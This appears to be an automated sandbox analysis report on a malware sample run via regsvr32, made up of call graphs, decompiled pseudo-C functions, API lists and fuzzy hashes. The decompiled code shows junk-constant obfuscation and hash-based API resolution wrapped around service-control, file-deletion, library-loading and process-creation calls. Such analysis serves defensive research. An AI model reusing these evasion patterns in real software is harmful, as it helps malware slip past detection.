4983->4984 4984->4983 4985 30c967 4984->4985 4986 303e99 GetPEB 4984->4986 4988 30c965 4984->4988 4989 31f94b GetPEB 4984->4989 5003 306c71 4984->5003 4987 313cbe GetPEB 4985->4987 4986->4984 4987->4988 4988->4059 4989->4984 4992 3035ca 4991->4992 4993 307f78 GetPEB 4992->4993 4994 303643 4993->4994 4994->4058 4996 3033d4 4995->4996 4997 307f78 GetPEB 4996->4997 4998 303453 4997->4998 4998->4981 5000 3094f1 4999->5000 5001 307f78 GetPEB 5000->5001 5002 30957c 5001->5002 5002->4976 5004 306c8e 5003->5004 5005 307f78 GetPEB 5004->5005 5006 306d06 5005->5006 5006->4984 5007 304313 5017 30484a 5007->5017 5009 30303a 2 API calls 5009->5017 5010 3117d2 GetPEB 5010->5017 5011 304a79 5012 3102d8 2 API calls 5011->5012 5014 304a77 5012->5014 5013 320575 GetPEB 5013->5017 5017->5009 5017->5010 5017->5011 5017->5013 5017->5014 5018 31a50a 2 API calls 5017->5018 5019 302263 GetPEB 5017->5019 5020 31eb61 5017->5020 5024 30bee4 5017->5024 5028 31487b 5017->5028 5018->5017 5019->5017 5021 31eb8f 5020->5021 5022 307f78 GetPEB 5021->5022 5023 31ec19 5022->5023 5023->5017 5025 30befd 5024->5025 5026 307f78 GetPEB 5025->5026 5027 30bf7c 5026->5027 5027->5017 5029 31488b 5028->5029 5030 307f78 GetPEB 5029->5030 5031 314902 5030->5031 5031->5017 5032 31f7f4 5033 31f8f9 5032->5033 5034 30e4f5 2 API calls 5033->5034 5039 31f93e 5033->5039 5035 31f90e 5034->5035 5040 309343 5035->5040 5038 31f94b GetPEB 5038->5039 5041 30935e 5040->5041 5043 3094a2 5041->5043 5044 319635 5041->5044 5043->5038 5045 31964e 5044->5045 5046 307f78 GetPEB 5045->5046 5047 3196c5 5046->5047 5047->5041 5048 316998 5049 302263 GetPEB 5048->5049 5050 316c12 5049->5050 5051 30bee4 GetPEB 5050->5051 5052 316c2b 5051->5052 5053 316c95 5052->5053 5054 31f5d9 2 API calls 5052->5054 5055 316c49 5054->5055 5056 318eb3 GetPEB 5055->5056 5057 316c70 5056->5057 5058 31f94b GetPEB 5057->5058 5059 316c83 5058->5059 5060 307bc6 2 API calls 5059->5060 5060->5053

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 431 306e01-306eb3 call 30c98a call 307f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00306E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				E0030C98A(_t36);
                                                                                                                				_v32 = 0x5e4691;
                                                                                                                				_v28 = 0xb22c2d;
                                                                                                                				_v24 = 0xd08f35;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0x466167;
                                                                                                                				_t48 = 0x37;
                                                                                                                				_v16 = _v16 / _t48;
                                                                                                                				_v16 = _v16 ^ 0x000b48c4;
                                                                                                                				_v8 = 0x78b9b;
                                                                                                                				_t49 = 0x12;
                                                                                                                				_v8 = _v8 / _t49;
                                                                                                                				_v8 = _v8 + 0x94cf;
                                                                                                                				_v8 = _v8 ^ 0x0006a86d;
                                                                                                                				_v12 = 0x7d284b;
                                                                                                                				_v12 = _v12 + 0xfffff9ba;
                                                                                                                				_v12 = _v12 ^ 0x007a5aaa;
                                                                                                                				E00307F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
                                                                                                                				_t46 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                				return _t46;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00306EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 4add2b2526553d604ed54c245a6b10de2cd945fc37b3a1cee01dff88c528c953
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: E61155B2D01218BBDB04DFA5C8498DEBFB6EF45314F10C189FA18AB281D7B55B259F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 545 308e38-308ee4 call 30c98a call 307f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00308E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t37;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				int _t53;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0030C98A(_t37);
                                                                                                                				_v12 = 0x1c994a;
                                                                                                                				_v12 = _v12 << 3;
                                                                                                                				_v12 = _v12 + 0xffff2161;
                                                                                                                				_v12 = _v12 | 0xd2ae04c7;
                                                                                                                				_v12 = _v12 ^ 0xd2e10dca;
                                                                                                                				_v8 = 0x3225a3;
                                                                                                                				_v8 = _v8 + 0xb485;
                                                                                                                				_t48 = 0x24;
                                                                                                                				_v8 = _v8 / _t48;
                                                                                                                				_v8 = _v8 + 0x1169;
                                                                                                                				_v8 = _v8 ^ 0x000adbd5;
                                                                                                                				_v16 = 0x918fbd;
                                                                                                                				_v16 = _v16 * 0x4a;
                                                                                                                				_v16 = _v16 ^ 0x2a1cf10f;
                                                                                                                				E00307F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
                                                                                                                				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
                                                                                                                				return _t46;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00308EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: a9d7199d19425bf4b7dcd9ee08feebe8c81b20735eac681f44aea2235bd8e12d
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 2D112271E01208FBEF05DFA4DA4A8DEBFB6EB05314F10C189E914A6250E7B55B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 307bc6-307c79 call 30c98a call 307f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00307BC6(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t42;
                                                                                                                				int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E0030C98A(_t42);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0xa8f244;
                                                                                                                				_v16 = 0x845cf1;
                                                                                                                				_t54 = 0x49;
                                                                                                                				_v16 = _v16 / _t54;
                                                                                                                				_v16 = _v16 | 0x150b5070;
                                                                                                                				_v16 = _v16 ^ 0x15045549;
                                                                                                                				_v12 = 0xcbfb15;
                                                                                                                				_v12 = _v12 ^ 0x1a866322;
                                                                                                                				_v12 = _v12 + 0xffff3502;
                                                                                                                				_v12 = _v12 ^ 0x1a48e6f8;
                                                                                                                				_v8 = 0xe2385a;
                                                                                                                				_v8 = _v8 | 0xfdf9d9f4;
                                                                                                                				_t55 = 0x6e;
                                                                                                                				_v8 = _v8 / _t55;
                                                                                                                				_v8 = _v8 + 0xffffa480;
                                                                                                                				_v8 = _v8 ^ 0x02430dde;
                                                                                                                				E00307F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
                                                                                                                				_t52 = DeleteFileW(_a4); // executed
                                                                                                                				return _t52;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 00307C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: ddc9f9dc7aeb3c496f0817031976a3b4ee156204c4db46c9805cccf186266703
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: E6116AB1D0124CFFDB08DFE9E94AA9EBBB1EB40304F208199E814B7290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 31ed7b-31ee13 call 30c98a call 307f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0031ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t33;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0030C98A(_t33);
                                                                                                                				_v16 = 0xcf28aa;
                                                                                                                				_v16 = _v16 + 0xffff6a13;
                                                                                                                				_v16 = _v16 ^ 0x00c8c4e4;
                                                                                                                				_v12 = 0x49ff01;
                                                                                                                				_t45 = 0xb;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_t46 = 0x5d;
                                                                                                                				_v12 = _v12 / _t46;
                                                                                                                				_v12 = _v12 ^ 0x00001054;
                                                                                                                				_v8 = 0x2a1e4a;
                                                                                                                				_v8 = _v8 | 0x32e5c17e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x00072801;
                                                                                                                				E00307F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
                                                                                                                				_t43 = CloseServiceHandle(_t53); // executed
                                                                                                                				return _t43;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0031EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: d2e427de289d1fffecdef91e7b20bfe9cb9d2f17ea3b80ee736f090a5f63fdfa
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 39015B71D01208BFDB08DFA4C94A8DEBFB5EF45314F10C08AE914AB241E7B25B558F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00304A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t32;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                				WCHAR* _t43;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t43 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E0030C98A(_t32);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x1178a2;
                                                                                                                				_v16 = 0x17846b;
                                                                                                                				_v16 = _v16 | 0x3185073b;
                                                                                                                				_v16 = _v16 + 0xffff538e;
                                                                                                                				_v16 = _v16 ^ 0x3197b69f;
                                                                                                                				_v12 = 0x16ba99;
                                                                                                                				_v12 = _v12 ^ 0x02625a09;
                                                                                                                				_v12 = _v12 ^ 0x25365766;
                                                                                                                				_v12 = _v12 ^ 0x27431ab3;
                                                                                                                				_v8 = 0xb183e3;
                                                                                                                				_v8 = _v8 * 0x28;
                                                                                                                				_v8 = _v8 | 0x77f20d23;
                                                                                                                				_v8 = _v8 ^ 0x7ff151f0;
                                                                                                                				E00307F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
                                                                                                                				_t39 = LoadLibraryW(_t43); // executed
                                                                                                                				return _t39;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 0e203ecac6e208201295f7157f811463872383ef11cb86b358fa403ce426dc52
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: A9111871C11208FFDB08DFA5DA469DEBBB4FB00315F60C189E415B6251D3715B549F94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00317B25() {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_v16 = 0x340970;
                                                                                                                				_t2 =  &_v16; // 0x340970
                                                                                                                				_t31 = 0x26;
                                                                                                                				_v16 =  *_t2 / _t31;
                                                                                                                				_v16 = _v16 ^ 0x000e30ec;
                                                                                                                				_v8 = 0x85299d;
                                                                                                                				_v8 = _v8 + 0xa54a;
                                                                                                                				_v8 = _v8 ^ 0x35a74c3e;
                                                                                                                				_v8 = _v8 ^ 0x3521895a;
                                                                                                                				_v12 = 0xcc7db5;
                                                                                                                				_v12 = _v12 >> 9;
                                                                                                                				_v12 = _v12 ^ 0x000f948d;
                                                                                                                				E00307F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
                                                                                                                				ExitProcess(0);
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00317B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: 45b6078ec12461d3bb8efde00d71fccc3f154a77b4a80ba1a02d77decd17f008
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: BBF08C71E0130CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0031A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E0030C98A(_t54);
                                                                                                                				_v28 = 0xdc14f8;
                                                                                                                				_v24 = 0xd964fd;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xcfd091;
                                                                                                                				_v16 = _v16 << 0x10;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x910ec0c9;
                                                                                                                				_v12 = 0x7a2ff2;
                                                                                                                				_t66 = 0x43;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xd721c1d7;
                                                                                                                				_v12 = _v12 ^ 0xd727192a;
                                                                                                                				_v8 = 0x1eb7c0;
                                                                                                                				_v8 = _v8 ^ 0x33199484;
                                                                                                                				_t67 = 0x2d;
                                                                                                                				_v8 = _v8 * 0xa;
                                                                                                                				_v8 = _v8 / _t67;
                                                                                                                				_v8 = _v8 ^ 0x05a21ecf;
                                                                                                                				E00307F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
                                                                                                                				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
                                                                                                                				return _t65;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0031A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: 6c5aeb19629d37ba9cd9c85beff13fd73e2ad82337c492e339406215e5c4f4b2
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: 0E21E372901108FBDF05CFE9C94A8DEBFB6EF48314F108149FA1866260D3728A60EF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0030816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t52;
                                                                                                                				struct _STARTUPINFOW* _t56;
                                                                                                                
                                                                                                                				_push(_a64);
                                                                                                                				_t56 = __ecx;
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(_a52);
                                                                                                                				_push(_a48);
                                                                                                                				_push(0);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E0030C98A(_t45);
                                                                                                                				_v12 = 0x5160ce;
                                                                                                                				_v12 = _v12 ^ 0x33bed16b;
                                                                                                                				_v12 = _v12 + 0xffffe3b5;
                                                                                                                				_v12 = _v12 | 0x3554987c;
                                                                                                                				_v12 = _v12 ^ 0x37f1882e;
                                                                                                                				_v8 = 0x57d154;
                                                                                                                				_v8 = _v8 + 0xffff861a;
                                                                                                                				_v8 = _v8 * 0x3e;
                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                				_v8 = _v8 ^ 0x0012f1da;
                                                                                                                				_v16 = 0x81ccd1;
                                                                                                                				_v16 = _v16 >> 4;
                                                                                                                				_v16 = _v16 >> 5;
                                                                                                                				_v16 = _v16 ^ 0x000c22df;
                                                                                                                				E00307F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
                                                                                                                				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
                                                                                                                				return _t52;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 00308236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: efa2a3d7c9a77284937e32d08bdd54c445663cb2de6f8ec1893e35124564aa91
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: E421C372801248BBCF169F95CD09CCFBFB9EB89714F108098FA1562161D3729A65EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00303466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t41 = __ecx;
                                                                                                                				E0030C98A(_t29);
                                                                                                                				_v8 = 0x88f6ec;
                                                                                                                				_v8 = _v8 | 0x6177bf25;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 + 0x167f;
                                                                                                                				_v8 = _v8 ^ 0x0004f919;
                                                                                                                				_v16 = 0x9ca171;
                                                                                                                				_v16 = _v16 >> 8;
                                                                                                                				_v16 = _v16 ^ 0x0005b7ae;
                                                                                                                				_v12 = 0xf5b080;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x54793a02;
                                                                                                                				_t35 = E00307F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
                                                                                                                				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003034FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: 995cd6da1270c1f8d8d89b51b3caa9e6bae1c1e9ae6a8b1fd533e096e879b5e9
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
